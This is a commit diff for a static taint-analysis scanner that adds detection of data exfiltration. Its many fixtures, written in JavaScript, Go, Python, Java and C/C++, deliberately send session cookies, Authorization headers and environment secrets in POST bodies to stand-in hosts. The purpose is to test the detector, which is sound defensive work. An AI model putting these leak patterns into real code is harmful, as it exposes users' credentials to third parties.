Added Cap::DATA_EXFIL and taint fp and fn fixes on real repos (#59)

* feat: Enhance data exfiltration detection with source sensitivity gating for cookies and headers

* feat: Implement cross-file data exfiltration detection with parameter-specific gate filters

* feat: Add calibration tests and refine DATA_EXFIL severity scoring logic

* feat: Introduce per-detector configuration for data exfiltration suppression

* feat: Enhance DATA_EXFIL findings with destination field tracking in diagnostics and SARIF output

* feat: Add tainted body and URL handling for data exfiltration detection

* feat: Add integration tests and fixtures for DATA_EXFIL and SSRF detection in Go

* feat: Add Java integration tests and fixtures for DATA_EXFIL detection across multiple HTTP clients

* feat: Add synthetic externals handling for closure-captured variables in SSA

* feat: Implement closure-based suppression for resource leak findings

* feat: Add regression guards for shell-injection and taint propagation in for-of destructure patterns

* feat: Implement constructor cap narrowing for data exfiltration detection in HTTP request builders

* feat: Add gated sinks for data exfiltration detection in C and C++ using curl_easy_setopt

* feat: Implement DATA_EXFIL cap parity for backwards analysis and add integration tests

* feat: Add data exfiltration sinks for various languages and enhance documentation

* refactor: Simplify formatting and improve readability in various files

* refactor: Improve readability by simplifying conditional statements and adding clippy linting

* docs: Update CHANGELOG and comments for data exfiltration features and configuration

* docs: Clarify configuration instructions for data exfiltration trusted destinations

* docs: Enhance comments for evidence routing logic in data exfiltration
This commit is contained in:
Eli Peter 2026-05-01 10:59:52 -04:00 committed by GitHub
parent a438886217
commit 58f1794a4e
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
189 changed files with 8421 additions and 383 deletions

View file

@ -0,0 +1,16 @@
var express = require('express');
var { forward } = require('./helper');
var app = express();
// Tainted body, fixed URL: DATA_EXFIL must fire on the body flow. The
// session cookie is a Sensitive-tier source, so taint carries the
// DATA_EXFIL bit through to the wrapper's body-gate. SSRF must NOT
// fire — the URL is a hardcoded literal and the cap-vs-position split
// keeps the body's taint from leaking onto the URL's gate.
app.get('/sync', function(req, res) {
var sid = req.cookies.session;
var payload = JSON.stringify({ session: sid });
forward('https://analytics.internal/track', payload);
res.status(204).end();
});

View file

@ -0,0 +1,14 @@
var express = require('express');
var { forward } = require('./helper');
var app = express();
// Tainted URL, fixed body: SSRF must fire on the URL flow. DATA_EXFIL
// must NOT fire — the body is a literal string, not a sensitive source,
// and the cap-vs-position split through the wrapper's summary keeps the
// URL's taint from leaking onto the body's gate.
app.get('/proxy', function(req, res) {
var taintedUrl = req.query.url;
forward(taintedUrl, '{"ok":true}');
res.status(204).end();
});

View file

@ -0,0 +1,22 @@
{
"required_findings": [
{ "id_prefix": "taint-unsanitised-flow", "min_count": 1 },
{ "id_prefix": "taint-data-exfiltration", "min_count": 1 }
],
"forbidden_findings": [
{
"id_prefix": "taint-data-exfiltration",
"file_glob": "**/caller_url_tainted.js"
},
{
"id_prefix": "taint-unsanitised-flow",
"file_glob": "**/caller_body_tainted.js"
}
],
"performance_expectations": {
"max_ms_no_index": 1500,
"max_ms_index_cold": 2000,
"max_ms_index_warm": 800,
"ci_mode": "lenient"
}
}

View file

@ -0,0 +1,10 @@
// Wrapper around `fetch` whose two parameters target distinct gated-sink
// classes on the inner call: `url` is the SSRF gate's destination; `body`
// is the DATA_EXFIL gate's payload. Pass-1 SSA summary extraction lifts
// the per-position cap split into `param_to_gate_filters` so cross-file
// callers can attribute SSRF vs DATA_EXFIL per argument.
function forward(url, body) {
fetch(url, { method: 'POST', body: body });
}
module.exports = { forward };

View file

@ -0,0 +1,17 @@
// Tainted body, fixed URL: DATA_EXFIL must fire on the body flow. The
// session cookie is a Sensitive-tier source, so taint carries the
// DATA_EXFIL bit through to the wrapper's Do gate. SSRF must NOT fire —
// the URL is a hardcoded literal and per-position cap attribution keeps
// the body's taint from leaking onto the URL's gate.
package fixture
import (
"net/http"
"strings"
)
func SyncCookie(r *http.Request) {
c, _ := r.Cookie("session")
body := strings.NewReader(c.Value)
Forward("https://analytics.internal/track", body)
}

View file

@ -0,0 +1,16 @@
// Tainted URL, hardcoded body: SSRF must fire on the URL flow. The
// query param is a `Plain` user-input source, so even though it carries
// `Cap::all()` upstream the source-sensitivity gate strips DATA_EXFIL
// for plain inputs. Only SSRF survives.
package fixture
import (
"net/http"
"strings"
)
func ProxyTarget(r *http.Request) {
target := r.URL.Query().Get("target")
body := strings.NewReader("hardcoded")
Forward(target, body)
}

View file

@ -0,0 +1,22 @@
{
"required_findings": [
{ "id_prefix": "taint-unsanitised-flow", "min_count": 1 },
{ "id_prefix": "taint-data-exfiltration", "min_count": 1 }
],
"forbidden_findings": [
{
"id_prefix": "taint-data-exfiltration",
"file_glob": "**/caller_url_tainted.go"
},
{
"id_prefix": "taint-unsanitised-flow",
"file_glob": "**/caller_body_tainted.go"
}
],
"performance_expectations": {
"max_ms_no_index": 1500,
"max_ms_index_cold": 2000,
"max_ms_index_warm": 800,
"ci_mode": "lenient"
}
}

View file

@ -0,0 +1,16 @@
// Wrapper whose two parameters target distinct gated-sink classes on the
// inner call: `url` is the SSRF gate's destination at `http.Post`'s
// arg 0; `body` is the DATA_EXFIL gate's payload at arg 2. Pass-1 SSA
// summary extraction lifts the per-position cap split into
// `param_to_gate_filters` so cross-file callers attribute SSRF vs
// DATA_EXFIL per argument.
package fixture
import (
"io"
"net/http"
)
func Forward(url string, body io.Reader) {
http.Post(url, "text/plain", body)
}

View file

@ -0,0 +1,18 @@
"""Tainted body, fixed URL: DATA_EXFIL must fire on the body flow. The
session cookie is a Sensitive-tier source, so taint carries the
DATA_EXFIL bit through to the wrapper's body-gate. SSRF must NOT fire —
the URL is a hardcoded literal and the cap-vs-position split keeps the
body's taint from leaking onto the URL's gate.
"""
from flask import Flask, session
from helper import forward
app = Flask(__name__)
@app.route('/sync')
def sync():
sid = session.get('user_token')
forward('https://analytics.internal/track', {'session': sid})
return '', 204

View file

@ -0,0 +1,17 @@
"""Tainted URL, fixed body: SSRF must fire on the URL flow. DATA_EXFIL
must NOT fire the body is a literal dict, not a sensitive source, and
the cap-vs-position split through the wrapper's summary keeps the URL's
taint from leaking onto the body's gate.
"""
from flask import Flask, request
from helper import forward
app = Flask(__name__)
@app.route('/proxy', methods=['POST'])
def proxy():
tainted_url = request.args.get('url')
forward(tainted_url, {'event': 'proxy_call'})
return '', 204

View file

@ -0,0 +1,22 @@
{
"required_findings": [
{ "id_prefix": "taint-unsanitised-flow", "min_count": 1 },
{ "id_prefix": "taint-data-exfiltration", "min_count": 1 }
],
"forbidden_findings": [
{
"id_prefix": "taint-data-exfiltration",
"file_glob": "**/caller_url_tainted.py"
},
{
"id_prefix": "taint-unsanitised-flow",
"file_glob": "**/caller_body_tainted.py"
}
],
"performance_expectations": {
"max_ms_no_index": 1500,
"max_ms_index_cold": 2000,
"max_ms_index_warm": 800,
"ci_mode": "lenient"
}
}

View file

@ -0,0 +1,12 @@
"""Wrapper around requests.post whose two parameters target distinct
gated-sink classes on the inner call: `url` is the SSRF gate's destination
(arg 0); `body` is the DATA_EXFIL gate's payload (json kwarg). Pass-1 SSA
summary extraction lifts the per-position cap split into
`param_to_gate_filters` so cross-file callers can attribute SSRF vs
DATA_EXFIL per argument.
"""
import requests
def forward(url, body):
requests.post(url, json=body)

View file

@ -0,0 +1,20 @@
"""demand_driven_data_exfil.
`Cap::DATA_EXFIL` parity for the backwards-analysis pass. The forward
engine emits a `taint-data-exfiltration` finding for the cookie
fetch-body flow (Sensitive source, fixed destination URL). With
`backwards_analysis = true`, the post-pass must walk backwards from the
DATA_EXFIL sink demand, reach the cookie source, and annotate the
finding with `backwards-confirmed`. Validates that the cap-routing
logic in `taint/backwards.rs::DemandState` round-trips bit 13
(DATA_EXFIL) identically to the SQL/CMD/SSRF caps the rest of the
demand-driven suite covers.
"""
import requests
from flask import request
def forward_session():
sid = request.cookies.get("session")
requests.post("https://analytics.internal/track", json={"session": sid})

View file

@ -0,0 +1,16 @@
{
"required_findings": [
{ "id_prefix": "taint-data-exfiltration", "min_count": 1 }
],
"forbidden_findings": [],
"noise_budget": {
"max_total_findings": 4,
"max_high_findings": 2
},
"performance_expectations": {
"max_ms_no_index": 1500,
"max_ms_index_cold": 2000,
"max_ms_index_warm": 800,
"ci_mode": "lenient"
}
}

View file

@ -0,0 +1,19 @@
// DATA_EXFIL fixture: a fixed destination URL and a Sensitive (cookie)
// source flowing into the outbound body of `http.Post`. SSRF must NOT
// fire (URL is hardcoded, position 0) but `Cap::DATA_EXFIL` must fire on
// the body (position 2) — the auth cookie is exactly the cross-boundary
// state DATA_EXFIL targets.
//
// Driven by `data_exfil_go_integration_tests.rs`.
package fixture
import (
"net/http"
"strings"
)
func leakCookie(r *http.Request) {
c, _ := r.Cookie("session")
body := strings.NewReader(c.Value)
http.Post("https://analytics.internal/track", "text/plain", body)
}

View file

@ -0,0 +1,27 @@
// Container-taint DATA_EXFIL: a `map[string]string` is populated with
// Sensitive cookie values across two keys, then encoded as form data and
// shipped as the body of an outbound `http.PostForm`. The Go SSA heap
// model marks the map's `Elements` slot tainted on every `payload[k] =
// ...` write; the sink-side `collect_tainted_sink_values` heap-loads
// the same slot when checking the form-data argument, so DATA_EXFIL
// must fire on the body channel even though the local map name itself
// is not directly tainted by an Assign. Pairs with
// `data_exfil_post_form.go` (single-write `url.Values` literal — no
// container-mutation step).
//
// Driven by `data_exfil_go_integration_tests.rs::map_assign_data_exfil`.
package fixture
import (
"net/http"
"net/url"
)
func leakSessionMap(r *http.Request) {
c, _ := r.Cookie("session")
a, _ := r.Cookie("auth")
form := url.Values{}
form["session"] = []string{c.Value}
form["auth"] = []string{a.Value}
http.PostForm("https://analytics.internal/track", form)
}

View file

@ -0,0 +1,24 @@
// DATA_EXFIL fixture for the two-step `http.NewRequest` → `client.Do`
// idiom. `http.NewRequest` is modeled as a body propagator (default
// arg → return propagation lifts body taint onto the returned
// `*http.Request`); the outbound network call happens at
// `http.DefaultClient.Do`, where the DATA_EXFIL gate fires on the
// request argument.
//
// SSRF must NOT fire (URL is hardcoded at NewRequest's URL position) and
// the cookie-derived body must surface DATA_EXFIL at the Do call.
//
// Driven by `data_exfil_go_integration_tests.rs`.
package fixture
import (
"net/http"
"strings"
)
func leakViaNewRequest(r *http.Request) {
c, _ := r.Cookie("session")
body := strings.NewReader(c.Value)
req, _ := http.NewRequest("POST", "https://analytics.internal/track", body)
http.DefaultClient.Do(req)
}

View file

@ -0,0 +1,18 @@
// DATA_EXFIL fixture: a Sensitive (header) source flowing into the form
// payload of `http.PostForm` (arg 1, `url.Values`). The destination URL
// is hardcoded so SSRF does not fire; only the form-data path activates
// the body-position gate.
//
// Driven by `data_exfil_go_integration_tests.rs`.
package fixture
import (
"net/http"
"net/url"
)
func leakAuthHeader(r *http.Request) {
auth := r.Header.Get("Authorization")
form := url.Values{"token": []string{auth}}
http.PostForm("https://analytics.internal/track", form)
}

View file

@ -0,0 +1,19 @@
// DATA_EXFIL silenced regression fixture: plain user input echoed into
// the body of an outbound `http.Post` to a fixed URL must NOT fire
// `Cap::DATA_EXFIL`. The user already controls `r.FormValue("msg")`, so
// surfacing it back into the request payload is not a cross-boundary
// disclosure. Source-sensitivity gating in `ast.rs` strips the cap.
//
// Driven by `data_exfil_go_integration_tests.rs`.
package fixture
import (
"net/http"
"strings"
)
func forwardUserInput(r *http.Request) {
msg := r.FormValue("msg")
body := strings.NewReader(msg)
http.Post("https://analytics.internal/track", "text/plain", body)
}

18
tests/fixtures/go/ssrf_url_tainted.go vendored Normal file
View file

@ -0,0 +1,18 @@
// SSRF regression fixture: attacker-controlled destination URL flows
// into `http.NewRequest`'s URL position (arg 1). SSRF must fire on the
// URL flow; DATA_EXFIL must NOT fire (the body is hardcoded `nil`).
// Cap attribution is per-position so a tainted URL never surfaces as
// data exfiltration.
//
// Driven by `data_exfil_go_integration_tests.rs`.
package fixture
import (
"net/http"
)
func proxy(r *http.Request) {
target := r.URL.Query().Get("target")
req, _ := http.NewRequest("GET", target, nil)
http.DefaultClient.Do(req)
}

View file

@ -0,0 +1,27 @@
// DATA_EXFIL fixture: Apache HttpClient. A request cookie (Sensitive)
// is wrapped in a StringEntity (default smear) and attached to an
// HttpPost via setEntity (also default smear). The network call
// happens at `httpClient.execute(req)`, which type-qualified resolution
// rewrites to `HttpClient.execute` via JAVA_HIERARCHY
// (CloseableHttpClient subtypes HttpClient). SSRF must NOT fire (URL
// is a hardcoded constant on the HttpPost ctor).
//
// Driven by `data_exfil_java_integration_tests.rs`.
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletRequest;
import org.apache.http.HttpResponse;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.entity.StringEntity;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
public class DataExfilApacheHttpClient {
public void leak(HttpServletRequest request) throws Exception {
Cookie[] cookies = request.getCookies();
String session = cookies[0].getValue();
CloseableHttpClient httpClient = HttpClients.createDefault();
HttpPost req = new HttpPost("https://analytics.internal/track");
req.setEntity(new StringEntity(session));
HttpResponse resp = httpClient.execute(req);
}
}

View file

@ -0,0 +1,28 @@
// DATA_EXFIL fixture: java.net.http chain. A Sensitive source (cookie)
// flows through `BodyPublishers.ofString(payload)` and the request
// builder chain into `client.send(req)` at a hardcoded URL. SSRF must
// NOT fire (URL is a fixed string) and `Cap::DATA_EXFIL` must fire
// because the cookie is exactly the cross-boundary state the cap
// targets.
//
// Driven by `data_exfil_java_integration_tests.rs`.
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpRequest.BodyPublishers;
import java.net.http.HttpResponse.BodyHandlers;
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletRequest;
public class DataExfilJdkHttpClient {
public void leak(HttpServletRequest request) throws Exception {
Cookie[] cookies = request.getCookies();
String session = cookies[0].getValue();
HttpClient client = HttpClient.newHttpClient();
HttpRequest req = HttpRequest.newBuilder()
.uri(URI.create("https://analytics.internal/track"))
.POST(BodyPublishers.ofString(session))
.build();
client.send(req, BodyHandlers.ofString());
}
}

View file

@ -0,0 +1,28 @@
// DATA_EXFIL fixture: OkHttp two-step. A session attribute (Sensitive)
// is wrapped via `RequestBody.create` (default arg return smear)
// and bound to the request via the builder chain. The network call
// happens at `client.newCall(req).execute()` which hits the
// chain-normalized `newCall.execute` matcher. SSRF must NOT fire on
// the hardcoded URL.
//
// Driven by `data_exfil_java_integration_tests.rs`.
import javax.servlet.http.HttpSession;
import okhttp3.MediaType;
import okhttp3.OkHttpClient;
import okhttp3.Request;
import okhttp3.RequestBody;
import okhttp3.Response;
public class DataExfilOkHttp {
public void leak(HttpSession session) throws Exception {
String token = (String) session.getAttribute("csrfToken");
OkHttpClient client = new OkHttpClient();
RequestBody body = RequestBody.create(
token, MediaType.parse("text/plain"));
Request req = new Request.Builder()
.url("https://analytics.internal/track")
.post(body)
.build();
Response resp = client.newCall(req).execute();
}
}

View file

@ -0,0 +1,23 @@
// DATA_EXFIL fixture: Spring RestTemplate. An HTTP header value (a
// Sensitive source) flows directly into the request body of
// `restTemplate.postForObject(url, body, type)`. The destination URL
// is hardcoded so SSRF must NOT fire. `Cap::DATA_EXFIL` must fire on
// the body position. Type-qualified resolution rewrites
// `restTemplate.postForObject` `HttpClient.postForObject` via the
// JAVA_HIERARCHY (RestTemplate subtypes HttpClient), reusing the same
// flat sink rule the JDK client uses.
//
// Driven by `data_exfil_java_integration_tests.rs`.
import javax.servlet.http.HttpServletRequest;
import org.springframework.web.client.RestTemplate;
public class DataExfilRestTemplate {
public void leak(HttpServletRequest request) {
String authHeader = request.getHeader("Authorization");
RestTemplate restTemplate = new RestTemplate();
restTemplate.postForObject(
"https://analytics.internal/track",
authHeader,
String.class);
}
}

View file

@ -0,0 +1,20 @@
// DATA_EXFIL fixture: Spring WebClient. A Sensitive source (env var)
// flows through `.bodyValue(payload)` on a fixed-URL chain. SSRF must
// NOT fire (URL is hardcoded) and `Cap::DATA_EXFIL` must fire at the
// body-binding step, since the bare-name `bodyValue` matcher hits
// independent of receiver type.
//
// Driven by `data_exfil_java_integration_tests.rs`.
import org.springframework.web.reactive.function.client.WebClient;
public class DataExfilWebClient {
public void leak() {
String secret = System.getenv("AWS_SECRET_ACCESS_KEY");
WebClient webClient = WebClient.create();
webClient.post()
.uri("https://analytics.internal/track")
.bodyValue(secret)
.retrieve()
.bodyToMono(String.class);
}
}

View file

@ -0,0 +1,25 @@
// Regression fixture: a tainted URL flowing into HttpClient.send must
// fire SSRF (taint-unsanitised-flow) but must NOT fire DATA_EXFIL.
// The body is a hardcoded literal so no Sensitive payload reaches the
// outbound request. This guards against over-firing DATA_EXFIL on
// flows where only the URL position is attacker-controlled.
//
// Driven by `data_exfil_java_integration_tests.rs`.
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpRequest.BodyPublishers;
import java.net.http.HttpResponse.BodyHandlers;
import javax.servlet.http.HttpServletRequest;
public class SsrfUrlOnlyNoDataExfil {
public void doGet(HttpServletRequest request) throws Exception {
String target = request.getParameter("url");
HttpClient client = HttpClient.newHttpClient();
HttpRequest req = HttpRequest.newBuilder()
.uri(URI.create(target))
.POST(BodyPublishers.ofString("ping"))
.build();
client.send(req, BodyHandlers.ofString());
}
}

View file

@ -1,11 +1,15 @@
// DATA_EXFIL fixture: a fixed destination URL and an attacker-influenced
// body. SSRF must NOT fire (destination is hardcoded) but `Cap::DATA_EXFIL`
// must fire on the body field — request-bound bytes are leaving the process
// via the outbound request payload.
// DATA_EXFIL fixture: a fixed destination URL and a sensitive (cookie /
// session) source flowing into the outbound body. SSRF must NOT fire
// (destination is hardcoded) but `Cap::DATA_EXFIL` must fire because the
// source is Sensitive (`req.cookies.session` carries auth material) — exactly
// the cross-boundary leak the cap targets.
//
// Plain user input echoed back into a body is intentionally not classified
// as data exfiltration, see `fetch_body_user_input_silenced.js`.
//
// Driven by `fetch_data_exfil_integration_tests.rs`.
function leakBody(req) {
var payload = req.body.message;
var payload = req.cookies.session;
fetch('/endpoint', {
method: 'POST',
body: payload,

View file

@ -0,0 +1,19 @@
// DATA_EXFIL type-suppression fixture: a Sensitive cookie source coerced
// to an integer via `parseInt(...)` is NOT a credential payload; the
// resulting numeric body cannot encode a session token, header secret, or
// other exfiltratable material. The type-aware sink suppression in
// `is_type_safe_for_sink` (see `src/ssa/type_facts.rs`) recognises the
// proven-`Int` SSA value at the gate and silences the cap.
//
// Negative regression: without DATA_EXFIL in the type-suppressible mask
// this would over-fire on every `fetch({ body: parseInt(req.cookies.x) })`
// pattern (e.g. analytics ingestion of session counters).
//
// Driven by `fetch_data_exfil_integration_tests.rs`.
function reportSessionCount(req) {
var count = parseInt(req.cookies.session_count, 10);
fetch('/metrics', {
method: 'POST',
body: count,
});
}

View file

@ -0,0 +1,15 @@
// DATA_EXFIL silenced regression fixture: plain user input echoed into the
// body of an outbound `fetch` to a fixed URL must NOT fire `Cap::DATA_EXFIL`.
// The user already controls `req.body.message` — surfacing it back into the
// request payload is not a cross-boundary disclosure. This is the canonical
// false-positive class for API gateways and telemetry forwarders that proxy
// `req.body`, killed by the source-sensitivity gate in `ast.rs`.
//
// Driven by `fetch_data_exfil_integration_tests.rs`.
function forward(req) {
var payload = req.body.message;
fetch('/endpoint', {
method: 'POST',
body: payload,
});
}

View file

@ -0,0 +1,17 @@
// DATA_EXFIL allowlist-suppression fixture.
//
// The destination URL has a static prefix (`https://api.internal/...`) that
// the test harness installs as a trusted destination via
// [detectors.data_exfil.trusted_destinations]. The body still carries a
// Sensitive source (`req.cookies.session`), but routing it through a known-
// trusted upstream is a *legitimate* forwarding pipeline: the cap is
// suppressed for this filter only.
//
// Driven by `fetch_data_exfil_suppression_tests.rs`.
function leakBody(req) {
var payload = req.cookies.session;
fetch('https://api.internal/forward', {
method: 'POST',
body: payload,
});
}

View file

@ -0,0 +1,15 @@
// DATA_EXFIL allowlist-NEGATIVE fixture.
//
// The destination URL prefix (`https://untrusted.example.com/`) is NOT
// covered by the harness-installed
// [detectors.data_exfil.trusted_destinations] entries, so the cap MUST
// still fire on a Sensitive source flowing into the body.
//
// Driven by `fetch_data_exfil_suppression_tests.rs`.
function leakBodyExternal(req) {
var payload = req.cookies.session;
fetch('https://untrusted.example.com/intake', {
method: 'POST',
body: payload,
});
}

View file

@ -0,0 +1,13 @@
// DATA_EXFIL sanitizer-convention fixture.
//
// `logEvent({user: req.cookies.session})` routes a Sensitive cookie source
// through a named telemetry boundary. The forwarding-wrapper convention
// (see docs/detectors/taint.md) treats `logEvent` as a default
// `Sanitizer(Cap::DATA_EXFIL)` so the cap does NOT fire on this call.
//
// Driven by `fetch_data_exfil_suppression_tests.rs`.
function track(req) {
logEvent({
user: req.cookies.session,
});
}

View file

@ -0,0 +1,13 @@
#include <curl/curl.h>
#include <stdlib.h>
void leak_env() {
char *token = getenv("AUTH_TOKEN");
if (!token) return;
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://analytics.internal/track");
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, token);
curl_easy_perform(curl);
curl_easy_cleanup(curl);
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_easy_setopt(handle, CURLOPT_POSTFIELDS, body) gated sink: the activation arg (CURLOPT_POSTFIELDS) is matched as a preprocessor-macro identifier via the macro-arg fallback, so DATA_EXFIL fires only at the body-binding setopt call (not at the CURLOPT_URL setopt above it). getenv(\"AUTH_TOKEN\") is Sensitivity::Sensitive so DATA_EXFIL must fire.",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "macro-activation"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [4, 12],
"notes": "getenv(\"AUTH_TOKEN\") → SourceKind::EnvironmentConfig → Sensitivity::Sensitive — DATA_EXFIL fires on the curl_easy_setopt body-binding call gated by CURLOPT_POSTFIELDS."
}
]
}

View file

@ -0,0 +1,13 @@
#include <curl/curl.h>
#include <stdio.h>
void forward_stdin() {
char input[256];
if (!fgets(input, sizeof(input), stdin)) return;
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://telemetry.internal/forward");
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, input);
curl_easy_perform(curl);
curl_easy_cleanup(curl);
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_easy_setopt CURLOPT_POSTFIELDS body-binding with a plain user-input source (fgets/stdin). DATA_EXFIL must NOT fire: the body source is Sensitivity::Plain (raw user input) and the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL. Pairs with data_exfil_curl_postfields.c to assert per-tier routing for C.",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [4, 12],
"notes": "Body source is plain user input (fgets from stdin → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources — plain user input echoed into a request body is not data exfiltration."
}
]
}

View file

@ -0,0 +1,13 @@
#include <curl/curl.h>
#include <cstdlib>
void leak_env() {
const char *token = std::getenv("AUTH_TOKEN");
if (!token) return;
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://analytics.internal/track");
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, token);
curl_easy_perform(curl);
curl_easy_cleanup(curl);
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_easy_setopt(handle, CURLOPT_POSTFIELDS, body) gated sink in C++: same gating model as the C fixture. The activation arg (CURLOPT_POSTFIELDS) is matched as a preprocessor-macro identifier via the macro-arg fallback, so DATA_EXFIL fires only at the body-binding setopt call. std::getenv is Sensitivity::Sensitive so DATA_EXFIL must fire.",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "macro-activation"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [4, 12],
"notes": "std::getenv(\"AUTH_TOKEN\") → SourceKind::EnvironmentConfig → Sensitivity::Sensitive — DATA_EXFIL fires on the curl_easy_setopt body-binding call gated by CURLOPT_POSTFIELDS."
}
]
}

View file

@ -0,0 +1,13 @@
#include <curl/curl.h>
#include <cstdio>
void forward_stdin() {
char input[256];
if (!fgets(input, sizeof(input), stdin)) return;
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://telemetry.internal/forward");
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, input);
curl_easy_perform(curl);
curl_easy_cleanup(curl);
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_easy_setopt CURLOPT_POSTFIELDS body-binding with a plain user-input source (std::getline from std::cin). DATA_EXFIL must NOT fire: the body source is Sensitivity::Plain (raw user input) and the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL. Pairs with data_exfil_curl_postfields.cpp to assert per-tier routing for C++.",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [4, 12],
"notes": "Body source is plain user input (std::getline from std::cin → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources — plain user input echoed into a request body is not data exfiltration."
}
]
}

View file

@ -0,0 +1,19 @@
{
"description": "Container-taint DATA_EXFIL: tokens array pushed with req.cookies.session is JSON-stringified into a fetch body. The SSA heap Elements slot carries the cap from `tokens.push(...)` to the sink-side `collect_tainted_sink_values` heap-load, so DATA_EXFIL must fire on the body field even though `payload` itself is not directly tainted by an Assign.",
"tags": ["taint", "data-exfil", "fetch", "container", "heap-elements", "cookie", "edge-case"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [12, 17],
"notes": "tokens.push(req.cookies.session) → JSON.stringify({batch: tokens}) → fetch body. Heap Elements taint must round-trip through the container."
},
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [12, 17],
"notes": "fetch URL is a fixed literal — body taint must not surface as SSRF."
}
]
}

View file

@ -0,0 +1,21 @@
var express = require('express');
var app = express();
// Container-taint DATA_EXFIL: push a Sensitive cookie source into an
// array, then send the joined batch as the outbound `fetch` body. The
// SSA heap model marks the array's `Elements` slot tainted at the
// `tokens.push(...)` write; the sink-side `collect_tainted_sink_values`
// loads the same slot and observes the cap, so DATA_EXFIL must fire on
// the body channel even though the body var (`payload`) is not directly
// tainted. Pairs with `array_push_taint.js` (same shape, different
// sink: XSS).
app.post('/batch', function(req, res) {
var tokens = [];
tokens.push(req.cookies.session);
var payload = JSON.stringify({ batch: tokens });
fetch('https://analytics.internal/track', {
method: 'POST',
body: payload,
});
res.status(204).end();
});

View file

@ -0,0 +1,19 @@
{
"description": "Async/await DATA_EXFIL parity: an `await fetch(URL, {body: ...})` call with a Sensitive cookie source must fire DATA_EXFIL on the body field (no SSRF — destination is a fixed literal). Awaits do not strip taint; the cap split is preserved across the await edge identically to the synchronous fetch path.",
"tags": ["taint", "data-exfil", "fetch", "async", "await", "cookie", "edge-case"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [13, 16],
"notes": "req.cookies.session → JSON.stringify into await fetch body. Await must not silence the cap."
},
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [13, 16],
"notes": "fetch URL is a fixed literal — body taint must not fire as SSRF."
}
]
}

View file

@ -0,0 +1,18 @@
var express = require('express');
var app = express();
// Async/await DATA_EXFIL: `await fetch(...)` must preserve the cap
// split. The destination URL is a fixed string literal (so SSRF must
// NOT fire) but a Sensitive cookie source threads through the body
// channel of the awaited call, so `Cap::DATA_EXFIL` MUST fire on the
// body field. Awaiting a Promise does not strip taint, the SSA lowering
// preserves chained await values across .then/.await edges identically
// to the synchronous fetch case.
app.post('/sync-async', async function (req, res) {
var sid = req.cookies.session;
await fetch('https://analytics.internal/track', {
method: 'POST',
body: JSON.stringify({ session: sid }),
});
res.status(204).end();
});

View file

@ -0,0 +1,13 @@
{
"description": "Constructor cap narrowing: env secret flowing through `new Stripe(key)` must not propagate FILE_IO into the wrapper, so SDK-method-returned property values written to a file do not flag a phantom path-traversal flow.",
"tags": ["taint", "file_io", "constructor", "sdk", "negative", "regression-fp"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [9, 16],
"notes": "process.env.STRIPE_SECRET_KEY → new Stripe(key) → stripe.prices.create() → price.id → fs.writeFileSync — wrapper-object construction strips FILE_IO."
}
]
}

View file

@ -0,0 +1,17 @@
// Constructor cap narrowing: a third-party SDK client constructed from an
// env-derived secret returns objects whose string properties are
// SDK-generated, not derived from the secret in any path-shaped sense.
// `Cap::all()` flowing through `new Stripe(key)` must drop FILE_IO so
// downstream `fs.writeFileSync` of an SDK property does not flag a phantom
// path-traversal flow.
var fs = require('fs');
var key = process.env.STRIPE_SECRET_KEY;
var stripe = new Stripe(key);
async function setup() {
var price = await stripe.prices.create({ unit_amount: 9599 });
var line = 'PRICE_ID="' + price.id + '"';
fs.writeFileSync('./out.env', line);
}
setup();

View file

@ -0,0 +1,19 @@
{
"description": "Session-id forwarder: req.cookies.session (Sensitive-tier source) flows into a fixed-URL fetch body. SSRF must NOT fire (destination is hardcoded), but Cap::DATA_EXFIL MUST fire — auth-bearing operator state is leaving the process via the outbound payload. Pairs with fetch_tainted_body_safe.js (Plain source, silenced) to assert the source-sensitivity gate routes per-tier rather than globally.",
"tags": ["taint", "data-exfil", "fetch", "sensitivity-gate", "cookie", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [10, 17],
